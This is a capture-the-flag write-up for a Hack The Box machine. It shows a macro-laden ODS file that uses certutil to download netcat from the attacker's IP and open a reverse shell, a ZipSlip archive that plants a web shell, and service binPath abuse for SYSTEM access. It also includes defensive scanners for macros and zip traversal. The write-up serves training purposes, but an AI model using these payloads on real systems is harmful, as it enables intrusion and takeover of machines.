As always, start with an nmap scan:

root@kali:~/htb/re# nmap -p- -sT -oN nmapscan 10.10.10.144
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-20 03:27 EST
Stats: 0:00:25 elapsed; 0 hosts completed (1 up), 1 undergoing Connect Scan
Connect Scan Timing: About 14.92% done; ETC: 03:30 (0:02:23 remaining)
Nmap scan report for 10.10.10.144
Host is up (0.029s latency).
Not shown: 65533 filtered ports
PORT    STATE SERVICE
80/tcp  open  http
445/tcp open  microsoft-ds
I found the shares with smbmap:

root@kali:~/htb/re# smbmap -H 10.10.10.144 -u guest -p ''
[+] Finding open SMB ports....
[+] User SMB session establishd on 10.10.10.144...
[+] IP: 10.10.10.144:445        Name: reblog.htb
        Disk                                                    Permissions
        ----                                                    -----------
        IPC$                                                    READ ONLY
        malware_dropbox                                         READ ONLY
Next I read reblog.htb and then uploaded a malicious odt file; later it turned out it had to be an ods file.
In metasploit there is an exploit that should work:
exploit/multi/misc/openoffice_document_macro
We rename the resulting file to .zip and edit it, replacing the payload with:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE script:module PUBLIC "-//OpenOffice.org//DTD OfficeDocument 1.0//EN" "module.dtd">
<script:module xmlns:script="http://openoffice.org/2000/script" script:name="Module1" script:language="StarBasic">
Sub OnLoad
    Shell("certutil.exe -urlcache -split -f 'http://10.10.14.7/nc.exe' C:\Windows\System32\spool\drivers\color\nc.exe")
    Shell("C:\Windows\System32\spool\drivers\color\nc.exe 10.10.14.7 1111 -e cmd.exe")
End Sub
</script:module>
root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 02:19:02 2020
  ..                                  D        0  Wed Jan 22 02:19:02 2020

                8247551 blocks of size 4096. 4294559 blocks available
smb: \> put puckiestyle.odt
putting file puckiestyle.odt as \puckiestyle.odt (28.8 kb/s) (average 28.8 kb/s)
smb: \>

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 04:03:03] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:04] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [22/Jan/2020 04:03:53] "GET /nc.exe HTTP/1.1" 200 -

root@kali:~/htb/re# smbclient //reblog.htb/"malware_dropbox" -u blah
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 22 04:59:00 2020
  ..                                  D        0  Wed Jan 22 04:59:00 2020

                8247551 blocks of size 4096. 4294527 blocks available
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.0 kb/s) (average 28.0 kb/s)
smb: \> put facelesscoder.ods
putting file facelesscoder.ods as \facelesscoder.ods (28.1 kb/s) (average 28.1 kb/s)
smb: \>
Here is the odt/ods file I used: https://github.com/puckiestyle/pentest/blob/master/puckiestyle.ods.zip

root@kali:~# rlwrap nc -nlvp 1111
listening on [any] 1111 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49675
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\Program Files\LibreOffice\program>whoami
whoami
re\luke

C:\Program Files\LibreOffice\program>

c:\Users\luke\Desktop>type user.txt
type user.txt
FE41736F5B9311E48E48B520D9F384D3
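The box itself runs a YARA rule (ods.yara) over the dropbox, which is the defender's side of the macro above: an ODT/ODS file is a zip archive, and any embedded Basic code lives under Basic/<library>/<module>.xml. The scanner below is an added example (not part of the original write-up) that lists every StarBasic module in such a document together with the Sub names and host-interaction calls it contains; the watch-list of calls and the sample archive it builds are constructed for this example.

```python
import io
import re
import zipfile
from typing import Dict, List

# StarBasic calls that let a document run external programs or automate the host.
# Constructed watch-list for this example; extend it to match your own policy.
SUSPICIOUS_CALLS = re.compile(r"\b(Shell|CreateObject|GetProcessServiceManager)\s*\(", re.I)


def scan_odf_macros(data: bytes) -> List[Dict[str, object]]:
    """Report every StarBasic module inside an ODF (ODT/ODS) archive.

    Each finding names the module, the Sub/Function names it defines and the
    suspicious calls found in it. An empty list means no Basic code is embedded.
    """
    findings = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            # ODF stores embedded Basic code as Basic/<library>/<module>.xml.
            if not (name.startswith("Basic/") and name.endswith(".xml")):
                continue
            text = zf.read(name).decode("utf-8", errors="replace")
            if 'script:language="StarBasic"' not in text:
                continue
            subs = re.findall(r"^\s*(?:Sub|Function)\s+(\w+)", text, re.M)
            calls = sorted({m.group(1) for m in SUSPICIOUS_CALLS.finditer(text)})
            findings.append({"module": name, "subs": subs, "calls": calls})
    return findings


def build_sample_ods() -> bytes:
    """Construct a minimal ODS-like archive with one Basic module (sample data, not a real document)."""
    module = (
        '<?xml version="1.0" encoding="UTF-8"?>\n'
        '<script:module xmlns:script="http://openoffice.org/2000/script" '
        'script:name="Module1" script:language="StarBasic">\n'
        "Sub OnLoad\n"
        '    Shell("placeholder.exe")\n'
        "End Sub\n"
        "</script:module>\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("mimetype", "application/vnd.oasis.opendocument.spreadsheet")
        zf.writestr("content.xml", "<office:document-content/>")
        zf.writestr("Basic/Standard/Module1.xml", module)
    return buf.getvalue()


if __name__ == "__main__":
    for f in scan_odf_macros(build_sample_ods()):
        print(f["module"], "subs:", f["subs"], "suspicious calls:", f["calls"])
```

Point it at files arriving in a share like malware_dropbox and any document that produces a finding deserves a look before it is opened in an office suite.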
Creating a ZipSlip archive
I built a ZipSlip archive by first creating the folders \inetpub\wwwroot\blog on my Kali box.
Then I copied puckieshell.ods there.
Then I created the ZipSlip archive with:
root@kali:/HTB/RE# zip temp.zip ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx
  adding: ../../../../../../../../inetpub/wwwroot/blog/puckieshell.aspx (deflated 75%)

Then upload this zipslip.zip to the ods folder, where it is analysed by the vulnerable WinRAR.
c:\Users\luke\Documents>dir
dir
 Volume in drive C has no label.
 Volume Serial Number is 4638-2C29

 Directory of c:\Users\luke\Documents

06/18/2019  01:05 PM    <DIR>          .
06/18/2019  01:05 PM    <DIR>          ..
01/22/2020  03:28 AM    <DIR>          malware_dropbox
01/22/2020  03:28 AM    <DIR>          malware_process
01/22/2020  03:46 AM    <DIR>          ods
06/18/2019  09:30 PM             1,096 ods.yara
06/18/2019  09:33 PM             1,783 process_samples.ps1
03/13/2019  05:47 PM         1,485,312 yara64.exe
               3 File(s)      1,488,191 bytes
               5 Dir(s)  17,559,576,576 bytes free

c:\Users\luke\Documents>whoami
whoami
re\luke

c:\Users\luke\Documents>certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
certutil -urlcache -split -f "http://10.10.14.7/puckiestyle.zip" "c:\Users\luke\Documents\ods\runme.rar"
****  Online  ****
  0000  ...
  322f
CertUtil: -URLCache command completed successfully.

root@kali:~/htb# python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.144 - - [22/Jan/2020 08:16:30] "GET /nc.exe HTTP/1.1" 200 -
10.10.10.144 - - [23/Jan/2020 04:00:25] "GET /puckiestyle.zip HTTP/1.1" 200 -
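The ZipSlip archive above works only because the extractor trusts the member name and writes `../../../../inetpub/...` relative to the output folder. The checker below is an added example (not from the original write-up): it lists every member of a zip that a naive extractor would write outside the chosen destination, covering `../` traversal, backslash variants, absolute paths and drive-letter prefixes. The destination path and the sample archive it builds are constructed for this example.

```python
import io
import posixpath
import zipfile
from typing import List


def unsafe_entries(data: bytes, dest: str = "/srv/extract") -> List[str]:
    """Return archive member names that a naive extractor would write outside dest.

    Pure string logic on normalised POSIX paths, so the result does not depend on
    the OS the check runs on or on whether dest exists.
    """
    dest = posixpath.normpath(dest)
    unsafe = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for name in zf.namelist():
            norm = name.replace("\\", "/")
            # An absolute path or a drive letter ignores dest entirely.
            if posixpath.isabs(norm) or (len(norm) > 1 and norm[1] == ":"):
                unsafe.append(name)
                continue
            target = posixpath.normpath(posixpath.join(dest, norm))
            if target != dest and not target.startswith(dest + "/"):
                unsafe.append(name)
    return unsafe


def build_sample_zip() -> bytes:
    """Construct a small archive with one benign entry and one traversal entry (sample data)."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr("docs/readme.txt", "harmless")
        # Same shape as the traversal name in the write-up, with a placeholder file name.
        zf.writestr("../../../../../../../../inetpub/wwwroot/blog/placeholder.aspx", "x")
    return buf.getvalue()


if __name__ == "__main__":
    print(unsafe_entries(build_sample_zip()))
```

Python's own `ZipFile.extractall` already strips such names, so the function is meant for auditing archives before they reach an extractor that does not, such as the WinRAR build on this box.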
Next I opened the browser and went to the shell.
I first created a folder c:\temp to store my files in, and then started a netcat session:
root@kali:~/htb/re# rlwrap nc -nlvp 443
listening on [any] 443 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49734
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.

C:\inetpub\wwwroot\blog>whoami
whoami
iis apppool\reblog

c:\Program Files\Sysinternals>accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt
accesschk -accepteula -uvwc * > c:\temp\accesscheck.txt

Accesschk v6.12 - Reports effective permissions for securable objects
Copyright (C) 2006-2017 Mark Russinovich
Sysinternals - www.sysinternals.com
In accesscheck.txt I then discovered that NT AUTHORITY\SERVICE also had RW access on UsoSvc:

c:\Program Files\Sysinternals>type c:\temp\accesscheck.txt
-snip-
UserManager
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW BUILTIN\Administrators
        SERVICE_ALL_ACCESS
UsoSvc
  Medium Mandatory Level (Default) [No-Write-Up]
  RW NT AUTHORITY\SYSTEM
        SERVICE_ALL_ACCESS
  RW NT AUTHORITY\SERVICE
        SERVICE_ALL_ACCESS
VaultSvc

For privilege escalation I used usosvc (first check the current binPath, then change it, and finally stop and start the usosvc service):
C:\inetpub\wwwroot\blog>sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
sc config usosvc binPath="C:\temp\nc.exe 10.10.14.7 53 -e cmd"
[SC] ChangeServiceConfig SUCCESS
C:\inetpub\wwwroot\blog>reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
reg query "HKLM\System\CurrentControlSet\Services\usosvc" /v "ImagePath"
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\usosvc
ImagePath REG_EXPAND_SZ C:\temp\nc.exe 10.10.14.7 53 -e cmd
C:\inetpub\wwwroot\blog>net stop usosvc
net stop usosvc
The Update Orchestrator Service service is not started.
More help is available by typing NET HELPMSG 3521.
C:\inetpub\wwwroot\blog>net start usosvc
net start usosvc
The service is not responding to the control function.
More help is available by typing NET HELPMSG 2186.
C:\inetpub\wwwroot\blog>
root@kali:~/htb/re# rlwrap nc -nlvp 53
listening on [any] 53 ...
connect to [10.10.14.7] from (UNKNOWN) [10.10.10.144] 49735
Microsoft Windows [Version 10.0.17763.107]
(c) 2018 Microsoft Corporation. All rights reserved.
C:\Windows\system32>whoami
whoami
nt authority\system
C:\Windows\system32>net user coby IEstyle
net user coby IEstyle
The command completed successfully.
C:\Windows\system32>net share root=C:\Users\administrator\desktop /grant:everyone,FULL
C:\Windows\system32>net use z: \\127.0.0.1\root /user:coby IEstyle
net use z: \\127.0.0.1\root /user:coby IEstyle
The command completed successfully.
C:\Windows\system32>z:
z:
Z:\>dir
dir
Volume in drive Z has no label.
Volume Serial Number is 4638-2C29
Directory of Z:\
04/14/2019 11:35 AM <DIR> .
04/14/2019 11:35 AM <DIR> ..
03/27/2019 05:37 AM 34 root.txt
1 File(s) 34 bytes
2 Dir(s) 17,572,204,544 bytes free
Z:\>type root.txt
type root.txt
1B4FB905423F4AD8D99C731468F7715D
Z:\>
Invoke-ServiceAbuse -Name "UsoSvc" -Command "\users\public\downloads\nc.exe 10.10.14.7 53 -e cmd"
Author: Puckiestyle